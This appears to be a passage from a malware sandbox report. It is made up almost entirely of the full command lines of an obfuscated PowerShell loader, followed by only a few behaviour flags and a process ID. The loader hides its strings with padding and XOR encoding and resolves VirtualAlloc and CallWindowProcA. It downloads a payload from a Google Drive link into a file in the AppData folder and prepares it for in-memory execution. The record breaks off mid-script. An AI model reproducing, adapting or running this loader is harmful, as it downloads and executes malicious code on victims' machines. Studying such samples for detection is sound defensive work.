SAEkEBlBChE WAFoE FD FE RA HEAr7 SETiD PA n4 NBfi9ChAPr4UdD IFglC h5BlFTh4BaF T4ruCAr0UtE IB HECo9PaE C5 DEGuDisEcaAGsDBe9 UB LEFiB BEVeCCo7ApF a1CaFPa6DeFPa6SiEMo1 KE SA EFFl0 KCHe0DuECaBAbENo9 RESa5KnEChDFrENeAGeADrABeC T0 CEpa1AvE S2 GE DDSoEpaAHoE A1anC C0AnF HD TEInAOuEUn5UdESe9giE PDScE P7 RCMa5 HFBa7YaFRe7FrEKr1 BE S9SpE F6DiEKi8NoFSaD AACiC NAAlC SCQuA IESg1JuF H3 TA S9 LC OB NEGr6 MEDrE CEPy1MuEUn7 SFSc0ReALe4DaD c7 UF MDMtFFo7 PFUd0 aEOr1 UEsa9CeAReAPoD A6HvE S1 FEst2OdEEr8HaE d1ThE R7UnF O0 VEPaDTvEErBFlEMoA OA WAGrCLi5laFSy7 BFKr7SuE T1KaEJo9 LEIn6FoEPr8 TF BDJaC SA IETe5QuE O9 sE L1EkA KCgrA M0DiD o6UnE KC QEEmB PEBv9 KBKoCDiA ADGlANeDLnASt8OcA E4HaDEfF AD T7LoF SDCiF F7FnF U0NoEBe1FlE T9 TAStAAgDNi6 MEOp1 TEVe2FoE C8 yESy1DoE F7HjFHe0BrEPeDUnE BBPeEExABiA LAKiCIn1MaEBo9maE SDsaFOn0PeAInA CCGe5HeF E7AfF K7 AE R1UnEKi9 MEMo6ByEFj8 AFSkDreCUd6 RFDe1OrE FDFoEDy8SpEKs0 UE A1QuF U6RoCBy5AlEIn7 LEIn7 HERe1baF B7SkF A7 BDTr9 UB KE PBTeE LDCo6 FFSe1 REInAbrA TDpoA GAMaCUd0CoE E1BoEPe2UnELeDPrE SA IESi1 FCFr0InFReD zEOrABoEsp5AeE f9AfEUnDTeEEv7 PCSk9stEExB aE S0feF P1 aE B8leE S1 MAHuCSnADr0FuD D6BrE DCKlESpB SE S9CoBUnDUdAMi8UnARa4NeAAg0 FEKo2 ME T5MiE F8 MF T7TjEte1KoATuDSmA SASeC E0StESj1TeEWh2SyEHjDSlEUnA AE L1 IDTo0 TFOmDDaFFr4 SE B1 IA PCLiAOu0 IEOgFHeEKi1 GEHa1 FEUnAReE S8ByFBoDSeE P5 SBsp4MoACo8 PA B4SmAUn0BiEStF SEov1StEBa1AlEBaASkE D8 lFInDKlELi5 NBAc5StAUn8 BAdu4StDsrFWoDud7GlF TDFlFMi7 OF M0BoE F1LiECo9vaA KAKaC C9 DFHu1 OE B8InF T0NoEFlD BEed7 DEhi5LaFGo7DeF P0DyC v0seEEr1 AEBo8 TE P1AfEIn3ApEDo5SeF P0 TEKa1 TDIn9KeA SDOr'Af; g&Ou( M`$RektoeAfeDanGrlSayUpaSo7 N) T S`$ SM Re CnOfn AePrs M2De; R`$StMFaePon In Ue SsNe3 N Ca= T BsKya OmAflEne LvOte B0 M2rh Dy'NaASk0PuC RAClESuB SEHeA IEArD GEGeA UELa7 uE ADStAOtA BCMa0BrE T1StESy2OmEPrDEnEAnA IE t1 DC B7 IE SBbiEPaAUdFun7LoFKn0NaFBl6 RF U1 TEMo7ReF S0OvEKoB lFDo6 HAGrCMeAEl0ReD P6 FEStC AE SBPrEgr9SkB C2 hAAp8SlA P4RaDEsF KDmi7HyFReDPrFPi7AvF S0SrE B1MdE F9 SANyAOpD M6JeESy1ShE H2DuEHy8 PEFo1SkENu7 GFAl0 CEFlD BEReBShE kA PA MA CCSp7SkEhy5HeE G8InEIa8 PE oD PE RAMiE M3PiCHu7NeE FBOnECeADiFSi2 SE R1StEScACaF S0 REInD TEFoBDeESvAidFFl7FiDDa9AkBStEKoB IEUdDRe7VeF R0ChE A5AnEHoAFoEIn0 OE D5trF H6VoE I0 AA R8 GA M4BrA M0 MC Q7 OEMaB RFWi1XeE PALnFKn0MiEPa1 SF B6UdA PD WAEpAHnDNe7thEre1 TF c0SpCSeD SE O9UnFba4PaEte8TeECh1InE K9PaE S1 aEReA RF F0 aELa5 BFAf0SuE kDVrE SBUfESnAAaCWh2 UE O8ByETa5suEMi3VoFOv7TaAKyCQuAMa0 TDUn6BeEPoC VEYfB WECe9MoBPa3MuAEsD B'se; C&Do( R`$UnkBieMseFin Il UyAbava7 A) P Ka`$ NMMee Hn SnMie KsBe3Da;El`$ LMAkeObnShn Oe HsFl4 A Ch= A MosTjaBemNolKaeUdvRueOm0 M2Sl Br' mA O0DuC RAphE SB IE BAOvE UDStE DA YE s7EfEClDDiAMaA SC P0PlEFo1GrEFe2SuERiDCoEHyA UE E1TrCud9 JELi1UdF r0 SE UCMaESmB SEPe0HeATiCFlA U0PhE BFSaEHe1 YEPe1OmE TAVaETo8CuFBiD sEKo5 SBHa6ChA S8ObA P4StA G0 FE FF KE S1 PECa1 bE KAUdE A8ReFprDAtEno5 PBHe7GaAMa8 SAVe4 MAPr0smC PCDiECo1CaFomD DEIn0scE N5 BFSeD SEUn8TaE H5LiE CFAbA F8 UA S4 fAUn0DeC S7BoE GB lF R1RoEPaAHaF C0 SEIn1 BFFe6NoA EDOvAPaAslDAn7PrESi1FaF L0TiC MDSpETr9 tFPh4 NEre8GeEPl1 METi9PoEFl1TeE CAhaFUd0 VEBe5InFBy0FsERaD uEneB UE IAPeCMo2 OE E8TaE V5UtESy3StF B7 OA ACBeAHe0SuD C6PeEUnCPrEAfBPrECo9 FBAu3AnAMeDPe'Je; S& O(St`$ bkHyeDae KnFul UyGuaCr7Su)Fo G`$DaMTie Sn Nn AeRes G4In; E`$DoM FeadnAcn be PsOv5 p F=Un KsOdaAlmBelMeeSivTae H0Fa2Hj Re' RFTa6MiEBo1MoFKh0StFDi1FoF R6KaE IAgoARh4syA D0BaCMeAInETeBKaE TA uE HDSwE SAToEDa7NsE HDAfASvAHoCSy7OvFWr6TrETe1biEFr5LsFSt0 FEar1 SDFr0PaF vDudFUd4KoE D1spAudCfoAUnDOu' D;An& L(Pr`$ skSteHeeTanReluhyLiaZy7Go)Ne A`$StMOpeInnSvnBueGes H5 A Oy eu F;Ta}Te`$PoS UpKoa Ar Btlnl He GrBad D In= U Rs Maoum kl BeSav NeDi0Un2 G Sj' JE FF TE B1BeFLi6AkE DA DE C1FeE d8 BBDi7ReBLo6 J'Bu;Un`$BoMThe SnRenSteFosKl6Be Az=Re UdsFaadrm GlSveSivpre U0 s2 C Di'SkAUb0MoCLa5 RE fA HECa5 SFDe0foE UBBrE R9GoEVeDlaFFoETrE u5ShF H0 GA D4 SBfr9SkANu4DeDAnFSrDPr7GrFSuDFoFPl7GeF T0 cE C1MoEak9FlA BA uDCa6 BF S1 lE GANeFRd0EfEKaD TE F9 mEFo1 oAsoA SCHaD TE WA gFje0FoEDo1EcFOv6 SESyB RF T4SkDSc7 MELd1AgFPa6trFAc2 PE ADJeENo7FjE F1SlFBy7 RA DA AC H9ajENy5OpFBa6 SF U7 AEHeCCeEsp5 REPe8StDHe9OfBSuEEnBupEFoCTo3JuEce1 MFBr0MoCOp0HuE N1SkESt8SlE I1PaESt3AnEge5SyF K0CaEPr1 BCAc2paEUdB UFVa6UsCTe2PrFKi1UdEDeA BEVi7ErF T0 WE DD GE RB UE AATyDCa4 MEMeB SE CDBeE HAbeFNy0 FE S1 MF S6HoAReCEuA UC TE B2 LE IFPlFSk4 SA A4 SASl0CoD H7 MF A4nuEOv5 SF G6taF B0DkESk8BeE u1KaFMi6ReE C0spAEr4NeAGy0caEThFBrEMo1OvE P1BuEMiA AEHj8IcF CDCoE F5AnBKo0 BA UDNeA C8TrAUr4 MASuCBiCRo3UnC F0 RD E0SaA M4TrC U4 IA PCPrDlaF ECElDRaEGlAAsFPl0 SDGl4PoFUv0EfFUd6 fDSp9BaA F8 FAKl4BeD uFAnD M1AuC bDSlESaANoF F0 fB F7EdB I6 SDRo9ReAIn8BlA B4 RDAnF AD p1BaC aD TE RA UF U0AbB E7MiB t6 UDCr9 DAAd8MuApe4 bDOuFDaDMa1LyCpuDViEReA MF U0 DBUi7InBAd6NoD T9 AA rD RAHo4SeAHaC EDReFAnCGrDPaE AA sFEk0 FD S4UnFBu0BiFRe6 WD R9 TATuDFoAhvDOxAApDEr'Ra; U&Vi( U`$ FkJoe BePonInlsiyPaa H7Po) F Gi`$ TMTieSvn Vn Ae Ks c6 S;No`$ SEOvkLes Np pa L Hu=Sa PfCekTrpSy Gl`$BrkAbeoue wnovltoy KaNa5An T`$Kok De SeUfnWal Sy GaIn6 E;Tr`$SkM UeKlnBrn PePssVa7Gs un= N FsUta vm UlMieSevFoe I0Pe2 D D' SAGa0CoC T3diE A5BaENy9 SEJe9GlE a1 LB A6SaB T0AcBDeCGrB O7AnASt4 BB L9 GAre4 TApr0 FCOt5BlE FARaENo5taF S0 REIoB AEso9 tEdeDDoF NEBeERe5piF I0BrA TAMaCFrD AEDaA tF M2FoE OB SEthFReEBl1SeAblCImDCoF PC BD UE UAGeF T0 AD L4StF F0 EFSp6 SDTo9 KBMoEBaB LEFyDeuE SESk1IcFSk6 oE OB sAAn8BaA T4InBSv2HoB B1InB I0 RAPe8 KA U4 FBSe4 SFBiCAvB M7 LBSu4TsB C4 EB I4SeA I8 MAOp4 KBca4 BFbiC aB W0 LBkr4 TABeD F'Av; R&To( P`$BakFle Je SnBllKiypea H7 F)Il Te`$ LMPoeUsnSpnfieSksun7 H; P`$BuM Ve Tn CnAseBis D8Hy Sp=Ra UnsFjaunm Gl DePav Pe U0Ru2Ha La' GA B0MoCStAIrFPo1FoE a8 SFBe7AnFBo0 GE SDAfEDe8 LEBl8ReEIn1 KA d4 RB S9KaA T4DiARd0WiC M5FoEMaAFrEMy5 NFWi0ToEBoB SESo9TsERaD CFcoETrE C5RkF P0 LABoAKaCAsDAfEHeA AF G2 PE gB ZEFoF UE C1FlAAgCJeDneFReC FD TE RACoFLa0JoD A4NoF b0 RFDi6 ID A9 TBRuEFiB IE CD KEPiE P1 TFHa6PlEDeB GA R8SeACo4 MB a3InBCi4DiBUn0ReBSa5 TB S0FoB P7 FB C7LyB F2VrA C8 DA O4ScBod4 SFReCVaB l7FuB O4SpB N4 SB A4GrAti8OmA P4OiBAm4 AFKoCElBRe0EqATeD H'He; S&Bl( S`$ SkFoeJieBun TlbrySoa D7Su)Bi d`$ BMTaeBon EnIneFosTi8 T;El`$Cys HaUdmDeleneHyvReeSa0Pr1Ud Da= U C'Adh HtMot Ip Ls P:Fo/Ga/SldSur fiFav Se G. Sg Ao AoTeg Ml Me M.PrcProafm S/ IuKrc B? Ae Cx tpMao Mr Bt B=IndDroElw Mn Cl SoHaaSjd C&Spi MdAs=Pl1 LBAlZ W2 lB SJ lVSazZoqStO SMThD CwGoa LrMapSej SiSeT Sz SKSvETei NwHoaAr4 F2 UWFr1ghD KjAb9Jaq s' S;Be`$Kas RaSmmUdl BeStvEue G0 M0Pr S=Je Les SaFemPrl PesuvfoeSt0Or2 G S' SAIn0GiC S3ThE oBBaF E0UnE ACVoE DDBeF G0 rE A1 TF A7StASm4AlBAc9 MAOv4 CASeCLoCBaA FE E1 uFCo3EvAIo9 UCKoBGlEIm6FeEFrEChEUn1PaERe7 FF B0RaALo4TuCclA DE T1InF M0DiAubAEmDHa3DeE E1DiEFi6FlCGi7 NE F8 oE ADKrE D1 BEHeACyFIn0PaAMrD SAOpAGoC A0SaEApBPlFSu3 tELoASeEVa8HeEInBGrESr5TrECo0GgDPr7PsFSk0 MF K6 AELaDSpELeAPoE a3UnAWrC EA M0FoF E7smECo5FaEQu9LnE l8KuEHy1ScFRe2LiE B1BlBYd4 EBIs5ArA VD P'Ga; S`$FaMFoePenUdn SeUdsGu8Re Kn=Po Ns Ba Cm FlFle TvQueCa0 M2 C R' OA U0 YCha3grE k5VaENi9SkE B9myE F1PuB k6ReBKr0 EBhjCOxBBu6 sBTo9 KAKl0UnEBo1 TEFrAFaF T2UlBBuEFeE S5StFse4UbF S4KeETa0 FE A5DiFTa0 NEIr5Bi'Bu;La&Ba( M`$ Tk Ke Ze AnFol Fy uaSi7 O) C In`$ReMOkeSenHyn be Es S8 P; H`$StGUfa LmSpm Fe K2Ch4Sk8Ja2Em=St`$ AGSka Um AmVie T2 S4 N8 N2 N+Za'In\HaUIlntumAciDigSc.OmF CoGarAf'Bl; O`$PhGreopet BhMii ltTieCosTr= I' R'Ta; UiMuf E Ta(Lu- MnSgo StDi( STVie As dtte-MaP Ca Mt khAl T`$crGMiaSkm CmBaeAp2 T4Ud8Un2 S)Le) D F{ DwMeh SiLul be I S(Jo`$ SGEfo Ut DhSui FtLaeFis A b-AneCaq M K' B' H)fo Hi{ K& R(ne`$Pok AeBre Pnful OystaIn7 F) H Su`$ SsBraLom Sl De FvPreto0 A0 U; T& N( A`$ Sk Be CeTon RlGey Pa I7Bi)hi Sk(NesNea DmLal MeGuv NeWe0 C2 F be'NeD L7UnFAr0 AEFa5 CFCl6 SFAn0WoASi9 SDFr7ceE S8LoE M1ReEAt1KoF T4 BAFo4UnBLi1 R'Re) B;Ai} OSCoe htRe-LoCOvoMrnTatEkeVanCitHj S`$ LG MaNem TmOxeRe2Ta4 U8Te2Af Th`$FrGTwoLetRehliiRut ve jsIn;Tu}Ja`$EnG RosutBrhHyi St Ve Ss w F=Pr CaG KeNutBu- VC Ko TnFltBoe Tn Pt V Ov`$GlG maOumUnm EeNe2 N4Hi8Mu2Kr;Am`$RiMteeLan Cn OeNesJu9Sa kl=Zi ObsSpaSem PlFleSvvBre P0Am2 P C'RiAGe0FnCWa9 SEPe1BrE SA VESkAfoEJo1SaFAc7CrA P4crBUn9DrA E4SpDVeFStDEp7 TFUnDDrFMa7 SFKa0CoECl1 FEMa9EpA DA CC P7MeEOvBInE RADeF s2FoEUv1UgFFo6 UFAm0PrDMu9 WB ME SBFiEReCTa2CuFVi6AsE BBSiEUn9OpC M6OmECo5NyF S7 HEUd1 BB M2ReBRu0AfD E7 CFSc0UdFHv6AgE MDKoE UABrESh3FuAquCOlA U0SeCRe3HaEPoB SF K0 DE LC IE TDDrFCo0EsEBe1BeFPa7OuAOvDJe'Ge;St& C( s`$ BkMbe re Ln NlRoy ma F7Sk) K G`$ SMAue Wn Vn ReBus T9 F;Dr`$AtGFoo StPrhPhi At CeSps J0Sc Me= S AsPsa CmArlGueRevRae G0 T2Uv F'YiDSeFOvD M7 DF SD CF f7SgF A0LaEIn1 DEOv9kaA IAToD H6 RF T1LiEPoAHkF L0 mEHyD DE A9 PEKo1MiANeA GCObDNoE NAPaF C0LuE U1MoFWh6 PEReBTaFPa4 uD S7 SEPa1 BFKu6SkF H2 PEBiDfaEse7DiEce1SnFFr7BaAStATaC M9RhE O5grFFi6KaFAn7 OEExCLaE C5 PEMo8 PD F9 GBSkE TB WE QCDe7EnEEmB IF r4MiF VDEnATyCBlATv0 ICMu9NoEHy1HyE JA DEPoADeE r1 MFHe7CoA u8SiA U4TrBWo4SkABr8InAEl4SkAJv4KuATi0LiC B3 AE T5 AEMa9AdE K9svE E1 SB S6TrBRk0 PBGeCBiBOv7DeApi8RaA S4ChBFo2ThBSk1FoBPe0DaA SD s'Ka; B&le( F`$Brk De Re hn Cl cySkaKa7ud)Re P`$HaGSpoevtTehSaiVat TePlsKa0Ar;Ni`$SoPPrl GeSos Ek Ae Pn MeZanMi= T`$ GMFde Sn Sn Fe Gs K. BcTio Bu Dn Ft d-bo6 w5Om4Hv;Op`$ SG voHytGoh Vi St Ue BsSk1 P E=Ju Fs Ca Omkll Ke VvShe K0Pa2on La'IaD RFRkD T7OfFDiDViF S7BrF B0EnE V1 CE R9 SA LA VD F6 nFRu1RkEBlAPrF O0SpEOtD RESp9PeE B1UdAFoARiCBaD AE UABlFAl0 DECi1FaFdi6 AE RBNeFCa4MoD D7 nE L1 SFHy6JeF A2 BESwD IE O7MiEVo1GaFRe7PlA cAPyC T9AkE B5 LF M6DaFAr7OpEMeCScENo5AuE R8GrDSc9ThBprE SBKuENeCSo7DaE SBDiFHv4LiFalDAtA SC TA P0 PCgy9EiEUn1DiENeAPhEBrABlEPo1 PFTo7MeAMe8 SAjo4FoBBi2PaB K1 MBDe0HiABr8 LA E4MiAGl0DoCSuADeFBe1FlERy8ReF A7frFno0SpEThDSpE P8LnEMe8 mENo1DiAIn8 AABe4AnA K0AuDRe4IvETo8GrESp1BeFIn7 tEAkFLaEGe1SoEgaA OEHy1FiE IADeAFoD D'Gl;sp&Bu(Ch`$BukSke NeOnn NlEcyNoa R7 U)Na Pa`$ FG To Ct Ih DiMetLneAmsLa1Ti; B`$SaGpeoMutSkhStiFot de Us E2te Kr=Vi SsPaa SmKol IeTevSue T0we2Vi F'BeABl0LaCFi6SbFpo6 MFStDdrE S0 AF P7LyE GBReEUi9 PE I9BoECr1TiF p7 AASp4AfBMo9 OAMe4 VDReFInDSu7TrFaqD NFPo7PeFEs0 DEEf1 UENo9DeA mABoDTr6PeFEl1 SEPuAtrF K0 HEAdD DEPr9 SEWi1 RAPiA CC NDAnE OAgrF U0CeE R1exFEk6 DESyB TFKv4 VD T7KiEUr1 TFAf6PeFGy2 PEDaDNoEAf7RaEBu1 HFSe7BoACiA VCKv9SiE O5maFDi6 AFti7 GE PCreECy5 BE N8FoDUn9PrB TEFrBShEtuC S3AbE v1EnFPr0peC D0 EEIn1 AEAt8TrE L1TeE e3ReECh5SkF f0PeE F1 MC F2FiESuB RF F6idC A2AfFPr1RkE CAAnEKi7 oFBo0SaESnD EEFoB DESkA NDSe4 UEReBIdEUnDInE YACiFNg0GeEgl1PaFMa6seAreC SA eC PEOp2 HERuFMoFOp4 DAKl4MoA E0UnD S2EuE S5 KESmASmEMo0 OABe4BeAsm0FoCInFUrFHo6DeF BDSkEUn0UnAUdD PAHy8SuA h4CaAUpCsvC P3 TCTw0moD S0FoA c4LuC N4CoA CCBuD DFCoCChDWaENaA IFEl0 DD B4noFUn0 SFCo6MaDAj9 EA R8ToAgu4 PDAiF FCStDFeE BAChF N0 LDGy4 FFDa0 OF S6TaD H9RaAIn8 HABr4 ADPhFgaC BD BEBrAWeF h0 TD i4MeFSe0ReFPo6myD F9ArAOp8FdA D4UdD SF LC EDExETeA AF M0 EDFl4DeFNy0 PF U6LeDAl9sqASk8UnATa4 UDPoFSlC AD PE CAasFRe0piD A4 TFOv0 HFUn6 TDTi9 vA FD SAGr4FlAVaCViD UFTiC PDTrECrAFdF M0HoDte4 UFFi0PrFDe6 VD N9 MA RD DALiD SAUnD B' F;Pa& c(An`$OfkKle Ke Nn Bl ayZoa S7 A)In Bu`$ SGPro StThh IiUdt CeSosPa2Pl;Af`$ PG Jo BtTohpaiEutPheCtsSt3Dr S= B PusDea Cm Al GeprvRee R0Ti2Ri Kr'CaAaf0TrC S6 SF P6AeFFoDCiE P0 SFRe7TeE EB NEdu9UnE G9 BESs1 eF T7AnAElA SC FDDeECoAReFPr2efE MBBaESpFUdESk1 SA HC CA B0FoCch3VaEGu5 SESy9DyE E9FrEKo1FlB S6leBCl0vaBPsCTaBTe7BeAOn8CoAFo0FdCPaAUlFSv1BlEVa8UrFLe7inF L0 HEUtD DEVr8 ZE R8BoE P1 SAro8SvACe0TrC S1 aE AF LFKr7 IF P4FrE C5AsAst8DeBAm4KoA P8 ABDy4BoASoD N'Li;Et& M(Am`$FskPreBaeSnn KlPry BaAl7 I)br Ko`$ LG KoSktDeh Ai Rt Fe Rs O3 F#Ru;""";Function Gothites9 ([String]$Nontra53) { For($Benzami=2; $Benzami -lt $Nontra53.Length-1; $Benzami+=(2+1)){$samleve = $samleve + $Nontra53.Substring($Benzami, 1)}; $samleve;}$Tjene0 = Gothites9 ' OIUlEDiXSa ';$Tjene1= Gothites9 $Parrotb;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Po*er*\v1.0\*ll.e*e $Tjene1 ;}else{&$Tjene0 $Tjene1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function samleve02 { param([String]$Nontra53); $hetero = ''; Write-Host $hetero; Write-Host $hetero; Write-Host $hetero; $Ensomtammo = New-Object byte[] ($Nontra53.Length / 2); For($Benzami=0; $Benzami -lt $Nontra53.Length; $Benzami+=2){ $Ensomtammo[$Benzami/2] = [convert]::ToByte($Nontra53.Substring($Benzami, 2), 16); $Ensomtammo[$Benzami/2] = ($Ensomtammo[$Benzami/2] -bxor 132); } [String][System.Text.Encoding]::ASCII.GetString($Ensomtammo);}$Rhom0=samleve02 'D7FDF7F0E1E9AAE0E8E8';$Rhom1=samleve02 'C9EDE7F6EBF7EBE2F0AAD3EDEAB7B6AAD1EAF7E5E2E1CAE5F0EDF2E1C9E1F0ECEBE0F7';$Rhom2=samleve02 'C3E1F0D4F6EBE7C5E0E0F6E1F7F7';$Rhom3=samleve02 'D7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AACCE5EAE0E8E1D6E1E2';$Rhom4=samleve02 'F7F0F6EDEAE3';$Rhom5=samleve02 'C3E1F0C9EBE0F1E8E1CCE5EAE0E8E1';$Rhom6=samleve02 'D6D0D7F4E1E7EDE5E8CAE5E9E1A8A4CCEDE0E1C6FDD7EDE3A8A4D4F1E6E8EDE7';$Rhom7=samleve02 'D6F1EAF0EDE9E1A8A4C9E5EAE5E3E1E0';$Rhom8=samleve02 'D6E1E2E8E1E7F0E1E0C0E1E8E1E3E5F0E1';$Rhom9=samleve02 'CDEAC9E1E9EBF6FDC9EBE0F1E8E1';$keenlya0=samleve02 'C9FDC0E1E8E1E3E5F0E1D0FDF4E1';$keenlya1=samleve02 'C7E8E5F7F7A8A4D4F1E6E8EDE7A8A4D7E1E5E8E1E0A8A4C5EAF7EDC7E8E5F7F7A8A4C5F1F0EBC7E8E5F7F7';$keenlya2=samleve02 'CDEAF2EBEFE1';$keenlya3=samleve02 'D4F1E6E8EDE7A8A4CCEDE0E1C6FDD7EDE3A8A4CAE1F3D7E8EBF0A8A4D2EDF6F0F1E5E8';$keenlya4=samleve02 'D2EDF6F0F1E5E8C5E8E8EBE7';$keenlya5=samleve02 'EAF0E0E8E8';$keenlya6=samleve02 'CAF0D4F6EBF0E1E7F0D2EDF6F0F1E5E8C9E1E9EBF6FD';$keenlya7=samleve02 'CDC1DC';$keenlya8=samleve02 'D8';$Vand=samleve02 'D1D7C1D6B7B6';$Kryd=samleve02 'C7E5E8E8D3EDEAE0EBF3D4F6EBE7C5';function fkp {Param ($Weaselship102, $Hapse59) ;$Mennes0 =samleve02 'A0D4E5EAE5E9E5A4B9A4ACDFC5F4F4C0EBE9E5EDEAD9BEBEC7F1F6F6E1EAF0C0EBE9E5EDEAAAC3E1F0C5F7F7E1E9E6E8EDE1F7ACADA4F8A4D3ECE1F6E1A9CBE6EEE1E7F0A4FFA4A0DBAAC3E8EBE6E5E8C5F7F7E1E9E6E8FDC7E5E7ECE1A4A9C5EAE0A4A0DBAAC8EBE7E5F0EDEBEAAAD7F4E8EDF0ACA0EFE1E1EAE8FDE5BCADDFA9B5D9AAC1F5F1E5E8F7ACA0D6ECEBE9B4ADA4F9ADAAC3E1F0D0FDF4E1ACA0D6ECEBE9B5AD';&($keenlya7) $Mennes0;$Mennes5 = samleve02 'A0F4EBE8FDF7F0EBE9E1A4B9A4A0D4E5EAE5E9E5AAC3E1F0C9E1F0ECEBE0ACA0D6ECEBE9B6A8A4DFD0FDF4E1DFD9D9A4C4ACA0D6ECEBE9B7A8A4A0D6ECEBE9B0ADAD';&($keenlya7) $Mennes5;$Mennes1 = samleve02 'F6E1F0F1F6EAA4A0F4EBE8FDF7F0EBE9E1AACDEAF2EBEFE1ACA0EAF1E8E8A8A4C4ACDFD7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AACCE5EAE0E8E1D6E1E2D9ACCAE1F3A9CBE6EEE1E7F0A4D7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AACCE5EAE0E8E1D6E1E2ACACCAE1F3A9CBE6EEE1E7F0A4CDEAF0D4F0F6ADA8A4ACA0D4E5EAE5E9E5AAC3E1F0C9E1F0ECEBE0ACA0D6ECEBE9B1ADADAACDEAF2EBEFE1ACA0EAF1E8E8A8A4C4ACA0D3E1E5F7E1E8F7ECEDF4B5B4B6ADADADADA8A4A0CCE5F4F7E1B1BDADAD';&($keenlya7) $Mennes1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Counter,[Parameter(Position = 1)] [Type] $Heydaylak = [Void]);$Mennes2 = samleve02 'A0CAEBEAEDEAE7EDA4B9A4DFC5F4F4C0EBE9E5EDEAD9BEBEC7F1F6F6E1EAF0C0EBE9E5EDEAAAC0E1E2EDEAE1C0FDEAE5E9EDE7C5F7F7E1E9E6E8FDACACCAE1F3A9CBE6EEE1E7F0A4D7FDF7F0E1E9AAD6E1E2E8E1E7F0EDEBEAAAC5F7F7E1E9E6E8FDCAE5E9E1ACA0D6ECEBE9BCADADA8A4DFD7FDF7F0E1E9AAD6E1E2E8E1E7F0EDEBEAAAC1E9EDF0AAC5F7F7E1E9E6E8FDC6F1EDE8E0E1F6C5E7E7E1F7F7D9BEBED6F1EAADAAC0E1E2EDEAE1C0FDEAE5E9EDE7C9EBE0F1E8E1ACA0D6ECEBE9BDA8A4A0E2E5E8F7E1ADAAC0E1E2EDEAE1D0FDF4E1ACA0EFE1E1EAE8FDE5B4A8A4A0EFE1E1EAE8FDE5B5A8A4DFD7FDF7F0E1E9AAC9F1E8F0EDE7E5F7F0C0E1E8E1E3E5F0E1D9AD';&($keenlya7) $Mennes2;$Mennes3 = samleve02 'A0CAEBEAEDEAE7EDAAC0E1E2EDEAE1C7EBEAF7F0F6F1E7F0EBF6ACA0D6ECEBE9B2A8A4DFD7FDF7F0E1E9AAD6E1E2E8E1E7F0EDEBEAAAC7E5E8E8EDEAE3C7EBEAF2E1EAF0EDEBEAF7D9BEBED7F0E5EAE0E5F6E0A8A4A0C7EBF1EAF0E1F6ADAAD7E1F0CDE9F4E8E1E9E1EAF0E5F0EDEBEAC2E8E5E3F7ACA0D6ECEBE9B3AD';&($keenlya7) $Mennes3;$Mennes4 = samleve02 'A0CAEBEAEDEAE7EDAAC0E1E2EDEAE1C9E1F0ECEBE0ACA0EFE1E1EAE8FDE5B6A8A4A0EFE1E1EAE8FDE5B7A8A4A0CCE1FDE0E5FDE8E5EFA8A4A0C7EBF1EAF0E1F6ADAAD7E1F0CDE9F4E8E1E9E1EAF0E5F0EDEBEAC2E8E5E3F7ACA0D6ECEBE9B3AD';&($keenlya7) $Mennes4;$Mennes5 = samleve02 'F6E1F0F1F6EAA4A0CAEBEAEDEAE7EDAAC7F6E1E5F0E1D0FDF4E1ACAD';&($keenlya7) $Mennes5 ;}$Spartlerd = samleve02 'EFE1F6EAE1E8B7B6';$Mennes6 = samleve02 'A0C5EAE5F0EBE9EDFEE5F0A4B9A4DFD7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AAC9E5F6F7ECE5E8D9BEBEC3E1F0C0E1E8E1E3E5F0E1C2EBF6C2F1EAE7F0EDEBEAD4EBEDEAF0E1F6ACACE2EFF4A4A0D7F4E5F6F0E8E1F6E0A4A0EFE1E1EAE8FDE5B0ADA8A4ACC3C0D0A4C4ACDFCDEAF0D4F0F6D9A8A4DFD1CDEAF0B7B6D9A8A4DFD1CDEAF0B7B6D9A8A4DFD1CDEAF0B7B6D9ADA4ACDFCDEAF0D4F0F6D9ADADAD';&($keenlya7) $Mennes6;$Ekspa = fkp $keenlya5 $keenlya6;$Mennes7 = samleve02 'A0C3E5E9E9E1B6B0BCB7A4B9A4A0C5EAE5F0EBE9EDFEE5F0AACDEAF2EBEFE1ACDFCDEAF0D4F0F6D9BEBEDEE1F6EBA8A4B2B1B0A8A4B4FCB7B4B4B4A8A4B4FCB0B4AD';&($keenlya7) $Mennes7;$Mennes8 = samleve02 'A0CAF1E8F7F0EDE8E8E1A4B9A4A0C5EAE5F0EBE9EDFEE5F0AACDEAF2EBEFE1ACDFCDEAF0D4F0F6D9BEBEDEE1F6EBA8A4B3B4B0B5B0B7B7B2A8A4B4FCB7B4B4B4A8A4B4FCB0AD';&($keenlya7) $Mennes8;$samleve01 = 'https://drive.google.com/uc?export=download&id=1BZ2BJVzqOMDwarpjiTzKEiwa42W1Dj9q';$samleve00 = samleve02 'A0C3EBF0ECEDF0E1F7A4B9A4ACCAE1F3A9CBE6EEE1E7F0A4CAE1F0AAD3E1E6C7E8EDE1EAF0ADAAC0EBF3EAE8EBE5E0D7F0F6EDEAE3ACA0F7E5E9E8E1F2E1B4B5AD';$Mennes8 = samleve02 'A0C3E5E9E9E1B6B0BCB6B9A0E1EAF2BEE5F4F4E0E5F0E5';&($keenlya7) $Mennes8;$Gamme2482=$Gamme2482+'\Unmig.For';$Gothites='';if (-not(Test-Path $Gamme2482)) {while ($Gothites -eq '') {&($keenlya7) $samleve00;&($keenlya7) (samleve02 'D7F0E5F6F0A9D7E8E1E1F4A4B1');}Set-Content $Gamme2482 $Gothites;}$Gothites = Get-Content $Gamme2482;$Mennes9 = samleve02 'A0C9E1EAEAE1F7A4B9A4DFD7FDF7F0E1E9AAC7EBEAF2E1F6F0D9BEBEC2F6EBE9C6E5F7E1B2B0D7F0F6EDEAE3ACA0C3EBF0ECEDF0E1F7AD';&($keenlya7) $Mennes9;$Gothites0 = samleve02 